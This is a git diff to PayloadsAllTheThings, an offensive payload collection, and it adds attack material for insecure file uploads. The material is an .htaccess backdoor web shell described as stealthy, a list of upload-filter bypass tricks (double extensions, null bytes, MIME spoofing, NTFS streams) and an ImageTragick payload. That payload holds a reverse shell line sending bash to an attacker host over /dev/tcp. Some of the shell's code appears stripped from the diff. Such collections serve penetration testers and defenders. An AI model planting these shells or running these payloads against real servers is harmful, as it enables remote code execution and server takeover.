diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 957f1e6007..68acff5bad 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,6 +1,6 @@ # CONTRIBUTING -PayloadAllTheThings's Team :heart: pull requests :) +PayloadsAllTheThings' Team :heart: pull requests :) Feel free to improve with your payloads and techniques ! You can also contribute with a :beers: IRL, or using the sponsor button. diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo new file mode 100644 index 0000000000..97be883469 --- /dev/null +++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo @@ -0,0 +1,5 @@ +AddType application/x-httpd-php .htaccess +# +SetHandler server-status +SetHandler server-info + diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell new file mode 100644 index 0000000000..0b3b068266 --- /dev/null +++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell @@ -0,0 +1,23 @@ +# htaccess backdoor shell +# this is relatively stealthy compared to a typical webshell + +# overriding deny rule +# making htaccess accessible from the internet +# without this you'll get a HTTP 403 + +Require all granted +Order allow,deny +Allow from all + + +# Make the server treat .htaccess file as .php file +AddType application/x-httpd-php .htaccess + +# + +# To execute commands you would navigate to: +# http://vulnerable.com/.htaccess?cmd=YourCommand + +# If system(); isnt working then try other syscalls +# e.g. passthru(); shell_exec(); etc +# If you still cant execute syscalls, try bypassing php.ini via htaccess diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 1ffa55c74b..2e692e732c 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -12,48 +12,58 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at * [Picture upload with LFI](#picture-upload-with-lfi) * [Configuration Files](#configuration-files) * [CVE - Image Tragik](#cve---image-tragik) + * [ZIP Archive](#zip-archive) * [References](#references) ## Tools - [Fuxploider](https://github.com/almandin/fuxploider) +- [Burp> Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) ## Exploits ### PHP Extension -```powershell -.php -.php3 -.php4 -.php5 -.php7 - -Less known extensions -.pht -.phar -.phpt -.pgif -.phtml -.phtm - -Double extensions -.jpeg.php -.jpg.php -.png.php -``` +* Default PHP extensions + ```powershell + .php + .php3 + .php4 + .php5 + .php7 + ``` +* Less known extensions + ```powershell + .pht + .phps + .phar + .phpt + .pgif + .phtml + .phtm + .inc + ``` +* Double extensions + ```powershell + .jpeg.php + .jpg.php + .png.php + .*.php + ``` ### Other extensions -```powershell -asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0) -perl: .pl, .pm, .cgi, .lib -jsp : .jsp, .jspx, .jsw, .jsv, .jspf -Coldfusion: .cfm, .cfml, .cfc, .dbm -``` +* asp : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)` +* perl: `.pl, .pm, .cgi, .lib` +* jsp : `.jsp, .jspx, .jsw, .jsv, .jspf` +* Coldfusion: `.cfm, .cfml, .cfc, .dbm` ### Upload tricks +- Use double extensions : `.jpg.php` +- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` +- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr` + - Null byte (works well against `pathinfo()`) * .php%00.gif * .php\x00.gif @@ -61,13 +71,16 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm * .php\x00.png * .php%00.jpg * .php\x00.jpg +- Special characters + * file.php...... (In Windows when a file is created with dots at the end those will be removed) + * file.php%20 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) - - Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. + * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. +- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.") ### Picture upload with LFI @@ -78,6 +91,10 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi ### Configuration Files +If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. +If you are trying to upload files to an ASP server, take a look at the .config trick to execute code. + +Configuration files examples - .htaccess - web.config - httpd.conf @@ -86,12 +103,23 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi ### CVE - Image Tragik +Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1) + ```powershell -HTTP Request -Reverse Shell -Touch command +push graphic-context +viewbox 0 0 640 480 +fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' +pop graphic-context ``` +More payload in the folder `Picture Image Magik` + +### ZIP archive + +When a ZIP/archive file is automatically decompressed after the upload + +* Zip Slip: directory traversal to write a file somewhere else + ## References * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil